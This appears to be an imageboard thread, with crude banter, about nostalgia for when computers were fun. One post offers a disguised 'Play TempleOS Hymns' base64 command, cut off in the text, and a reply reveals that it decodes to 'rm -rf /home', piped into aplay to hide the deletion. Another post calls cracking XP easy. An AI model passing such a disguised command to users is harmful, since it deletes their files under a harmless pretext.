Remember when computer was fun?

remember when computer was fun?

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It's still fun.

its not that computers aren't fun any more, its just that you are old or lost interest

>posting with frens on phpBB
>learning HTML
>learning to write bootable DVDs
>playing about with the terminal for the first time
its over

anyone still playing around with their computers after like, 22 is really cringe and not kawaii at all


# Play TempleOS Hymns
`base64 -d

hit the wall with wangdoot? sounds about right.



No. I live it every day

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Put the fun back into computing. Use Linux, BSD.

Still is mother fucker.
So many things you can code. So many websites. So many games.
A lot of cool stuff, but remember to touch grass first and foremost. Touch grass, then use computer

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yeah, but it doesn't cut it anymore. games got stale, coding got stale, even electronics got stale. time to die.

in my case, i've realized that people are still doing cool shit on computers and the internet, just that i don't have the same drive to explore and search for cool stuff that i used to have. can still find some creative and fun stuff if i look for it.

pretty neat

it still is
music, as a musician, and sex, as a man, however….

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a week ago i needed to set up an old label printer through a vm on winxp because of driver support and it really was so much and better than anything made today :(

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decode base64 string cm0gLXJmIC9ob21l back to plaintext into 'rm -rf /home' and pipe it uselessly into aplay to give the illusion of the previous command not nuking your config files

the octal one was better, get a life

computers are fun, just not new computers. I love messing around with my old trash picked systems.

then switch back. Old hardware is cheap, xp is stupid easy to crack. The only thing stopping you is laziness.

>implying computers were ever fun

Come to us fren.

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>gradually I began to hate them

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